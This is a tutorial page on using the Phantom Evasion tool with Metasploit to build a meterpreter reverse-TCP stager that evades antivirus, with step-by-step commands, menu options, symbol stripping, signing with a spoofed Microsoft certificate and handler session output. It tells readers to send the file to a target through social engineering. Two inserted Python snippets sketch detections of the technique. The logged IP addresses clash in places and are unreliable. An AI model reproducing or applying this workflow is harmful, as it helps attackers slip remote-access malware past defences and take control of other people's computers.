HOW TO EVADE ANTIVIRUS PROTECTION WITH PHANTOM PAYLOADS

Metasploit is the most popular tool used in penetration tests; it is used to find weaknesses in a local network before attackers do. Below we present a tool used to test how much protection an operating system's antivirus actually provides.

In Kali Linux, Metasploit is installed by default and includes a large number of payloads used to generate malicious executables and compromise platforms. Today we show a tool called Phantom Evasion, which wraps msfvenom payloads in executables built for antivirus detection testing. The main objective of Phantom Evasion is to keep antivirus solutions from detecting those payloads.

  • Phantom Evasion has been tested on Kali Linux 2018.4 (amd64)
  • To clone the repository, type git clone https://github.com/oddcod3/Phantom-Evasion.git
  • Type cd Phantom-Evasion, then chmod u+x phantom-evasion.py
  • Type python3 phantom-evasion.py
  • When it is executed for the first time, some errors may appear, but the tool still works

Write 1

[>] Please insert option: 1

Write 2

[+] WINDOWS MODULES INDEX:

[1]  Shellcode Injection

[2]  Stager

[3]  Powershell / Wine-pyinstaller

[0]  Back

[>] Please insert option: 2

Write 1

[+] WINDOWS STAGER MODULES:

[1]  X86 stagers

[2]  X64 stagers

[0]  Back

[>] Please insert option: 1

Write 3

[+] WINDOWS x86 STAGER MODULES:

[1]  C meterpreter/reverse_TCP VirtualAlloc                           (C)

[2]  C meterpreter/reverse_TCP VirtualAlloc NoDirectCall GPAGMH       (C)

[3]  C meterpreter/reverse_TCP HeapAlloc                              (C)

[4]  C meterpreter/reverse_TCP HeapAlloc NoDirectCall GPAGMH          (C)

[5]  C meterpreter/reverse_HTTP VirtualAlloc                          (C)

[6]  C meterpreter/reverse_HTTP VirtualAlloc NoDirectCall GPAGMH      (C)

[7]  C meterpreter/reverse_HTTP HeapAlloc                             (C)

[8]  C meterpreter/reverse_HTTP HeapAlloc NoDirectCall GPAGMH         (C)

[9]  C meterpreter/reverse_HTTPS VirtualAlloc                         (C)

[10] C meterpreter/reverse_HTTPS VirtualAlloc NoDirectCall GPAGMH     (C)

[11] C meterpreter/reverse_HTTPS HeapAlloc                            (C)

[12] C meterpreter/reverse_HTTPS HeapAlloc NoDirectCall GPAGMH        (C)

[0]  Back

After selecting a payload, a description of the module is displayed, along with how the executable will be built

[+] MODULE DESCRIPTION:

This Module generate and compile

 32bit pure c meterpreter reverse tcp stagers.

 Require msfconsole multi/handler listener

 with payload set to windows/meterpreter/reverse_tcp

[>] Memory allocation type: HEAP

[>] TYPE: TCP

 [>] STATIC EVASION:

 Polymorphic source code

 [>] DYNAMIC EVASION:

 Resource consumption technique

 Sandbox-aware code

 [>] AUTOCOMPILE(cross platform): to EXE file

Press Enter to continue:

Enter 192.1.1.1 (IP address of the attacker)

[>] Please insert LHOST: 192.1.1.1

Enter 443 (port of the attacker)

[>] Please insert LPORT: 443

Then enter the name of the file: file

[>] Please insert output filename: file

Type n to create a single process on the target computer, which the author considers gives less chance of being caught by the antivirus

[>] Spawn Multiple Processes:

During target-side execution this will cause to spawn a maximum of 4 processes

consequentialy.

Only the last spawned process will reach the malicious section of code

while the other decoy processes spawned before will executes only random junk code

[>] Add multiple processes behaviour?(y/n): n
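The multi-process behaviour described above (a chain of up to four copies of the same executable, each spawning the next, with only the last one reaching the real code) leaves a recognisable parent/child pattern in process-creation telemetry. The following is an added detection example, not part of Phantom Evasion or the original page: it runs over constructed Sysmon-style event records (pid, parent pid, image path; the paths and pids are made up for illustration) and reports lineages in which a process keeps re-spawning its own image.

```python
from collections import defaultdict

# Constructed sample process-creation events (Sysmon Event ID 1 style).
# Fields: (pid, parent_pid, image). Not real telemetry.
EVENTS = [
    (400, 300, r"C:\Windows\explorer.exe"),
    (1001, 400, r"C:\Users\bob\Downloads\file.exe"),   # decoy 1
    (1002, 1001, r"C:\Users\bob\Downloads\file.exe"),  # decoy 2
    (1003, 1002, r"C:\Users\bob\Downloads\file.exe"),  # decoy 3
    (1004, 1003, r"C:\Users\bob\Downloads\file.exe"),  # process that runs the stager
    (2001, 400, r"C:\Program Files\App\app.exe"),
    (2002, 2001, r"C:\Program Files\App\app.exe"),     # one legitimate respawn
]


def self_spawn_chains(events, min_depth=3):
    """Return (image, [pids]) for lineages where each child runs the same
    image as its parent. Only chains of at least `min_depth` processes are
    reported, so a single legitimate respawn is not flagged."""
    by_pid = {pid: (ppid, image) for pid, ppid, image in events}
    children = defaultdict(list)
    for pid, ppid, image in events:
        # Link a child to its parent only when the parent is known and
        # runs the same image.
        if ppid in by_pid and by_pid[ppid][1] == image:
            children[ppid].append(pid)

    def chain_from(pid):
        chain = [pid]
        while children.get(chain[-1]):
            chain.append(children[chain[-1]][0])
        return chain

    chains = []
    for pid, (ppid, image) in by_pid.items():
        # Start a chain only at the top of a same-image lineage.
        starts_lineage = ppid not in by_pid or by_pid[ppid][1] != image
        if starts_lineage:
            chain = chain_from(pid)
            if len(chain) >= min_depth:
                chains.append((image, chain))
    return chains


if __name__ == "__main__":
    for image, chain in self_spawn_chains(EVENTS):
        print(f"self-spawn chain of {len(chain)} processes for {image}: {chain}")
```

With the default threshold only the four-process file.exe lineage is reported; lowering min_depth to 2 also catches the single app.exe respawn, which shows why the threshold matters.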

Write y

[>] Generating C meterpreter stager

[>] Compiling…

[>] Strip

strip is a GNU utility to “strip” symbols from object files.

This is useful for minimizing their file size, streamlining them for distribution.

It can also be useful for making it more difficult to reverse-engineer the compiled code.

(Lower rate of detection)

[>] Strip executable? (y/n): y

The above prompt strips symbols, reducing the size of the malicious file

Write y

[>] Sign Executable

Online Certificate spoofer & Executabe signer (Lower rate of detection)

[>] Sign executable? (y/n): y

  • The above prompt signs the malicious file with the default certificate that comes with Phantom Evasion
  • You can use your own certificate or the spoofed Microsoft certificate that ships with Phantom Evasion; the spoofed one is self-signed and does not chain to a trusted root, so it lowers detection only where a scanner rewards the mere presence of a signature, and a full Authenticode chain check still rejects it
  • Write y
  • Write 1

Certificates directory is not empty , use already existing certificate? (y/n): y

[1] www.microsoft.com

[2] Create new certificate

[>] Select a Certificate or create a new one: 1


[>] Insert sign software description (default: Notepad Benchmark Util):

[>] Signing file1.exe with osslsigncode…

[>] Succeeded

[<>] File saved in Phantom-Evasion folder

After creating the malicious file, send it to the target. You can use any social engineering variant to reach your goal

TESTING IN WINDOWS:

  • For the tests, we are using Windows 7 (32-bit) with Windows Defender disabled
  • Run the executable file by pressing Enter
  • To catch the payload's connection, use the Metasploit multi/handler that comes pre-installed on Kali Linux. Open another terminal and type msfconsole
  • Type use multi/handler

msf > use multi/handler

  • Type set LHOST 192.1.1.1 (same as entered in Phantom Evasion)
  • Type set LPORT 443 (same as entered in Phantom Evasion)
  • Type show options

msf exploit(multi/handler) > set LHOST 192.1.1.1

LHOST => 192.168.1.6

msf exploit(multi/handler) > set LPORT 443

LPORT => 443

msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.6      yes       The listen address (an interface may be specified)
   LPORT     443              yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

Write run

msf exploit(multi/handler) > run

  • Since the malicious executable has already been started on Windows 7 Professional 32-bit, a new session is created between the attacker and the target machine as soon as run is typed
  • Enter sysinfo to verify the details of the target computer

[*] Started reverse TCP handler on 192.1.1.1:443
[*] Sending stage (179779 bytes) to 192.168.1.9

[*] Meterpreter session 1 opened (192.1.1.1:443 -> 192.1.1.1:49250) at 2019-03-04 00:34:27 -0500

meterpreter > sysinfo

Computer        : WIN-31VSBP3FUQT

OS              : Windows 7 (Build 7601, Service Pack 1).

Architecture    : x86

System Language : en_US

Domain          : WORKGROUP

Logged On Users : 1

Meterpreter     : x86/windows

meterpreter >

  • Now you can control the target through the meterpreter command shell
  • For further testing, we used Windows 10 Enterprise 1809 (x64) with Windows Defender enabled
  • Run the malicious executable on the Windows 10 machine. As soon as it runs, a new session is created in multi/handler
  • Enter sysinfo to verify the details of the target computer

[*] Started reverse TCP handler on 192.1.1.1:443
[*] Sending stage (179779 bytes) to 192.1.1.1

[*] Meterpreter session 2 opened (192.168.1.6:443 -> 192.1.1.1:49753) at 2019-03-04 02:26:30 -0500

meterpreter > sysinfo

Computer        : DESKTOP-I9LEAU8

OS              : Windows 10 (Build 17758).

Architecture    : x64

System Language : en_US

Domain          : WORKGROUP

Logged On Users : 2

Meterpreter     : x86/windows

Now you can control the target through the meterpreter command shell
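The handler output above also shows why this stager remains visible on the wire even when the file itself passes antivirus: it connects to TCP 443 and the handler immediately pushes a 179779-byte stage in the clear, whereas a genuine HTTPS client opens the connection with a TLS ClientHello. The following is an added example (not from the page or from Metasploit) of that network-side check over constructed flow records; the record fields, the sample bytes and the 4-byte length prefix shown for the stage are assumptions for illustration.

```python
# Constructed flow records, not captured from a real network. Fields:
# (dst_port, first_client_bytes, first_server_bytes, server_bytes_first_second)
FLOWS = [
    # Legitimate HTTPS: the client opens with a TLS handshake record (0x16)
    # whose first message is a ClientHello (handshake type 0x01).
    (443, bytes.fromhex("160303009a0100009603035f"), bytes.fromhex("160303"), 4200),
    # reverse_tcp stager on 443: the client sends nothing, the handler speaks
    # first and pushes the stage (assumed here as a 4-byte length + body).
    (443, b"", (179779).to_bytes(4, "little") + b"\x00" * 8, 179779),
    # Plain HTTP on 80, outside the rule's scope.
    (80, b"GET / HTTP/1.1\r\n", b"HTTP/1.1 200 OK\r\n", 900),
]

TLS_CONTENT_HANDSHAKE = 0x16
TLS_HANDSHAKE_CLIENT_HELLO = 0x01


def looks_like_client_hello(data):
    """True if the first client bytes form a TLS handshake record whose first
    message is a ClientHello: 5-byte record header (type, version, length)
    followed by the handshake type byte."""
    return (len(data) >= 6
            and data[0] == TLS_CONTENT_HANDSHAKE
            and data[1] == 0x03          # record-layer version major byte
            and data[5] == TLS_HANDSHAKE_CLIENT_HELLO)


def flag_non_tls_443(flows):
    """Return (flow_index, reason) for port-443 flows that do not begin with a
    TLS ClientHello. A server that speaks first is reported separately, since
    that is how a reverse_tcp handler delivers its stage."""
    findings = []
    for i, (port, c_first, s_first, s_bytes) in enumerate(flows):
        if port != 443 or looks_like_client_hello(c_first):
            continue
        if not c_first and s_first:
            findings.append((i, f"server spoke first, pushed {s_bytes} bytes"))
        else:
            findings.append((i, "client data on 443 is not a TLS ClientHello"))
    return findings


if __name__ == "__main__":
    for idx, reason in flag_non_tls_443(FLOWS):
        print(f"flow {idx}: {reason}")
```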

This tool can be used to generate a baseline payload that can be further customized to evade other antivirus products.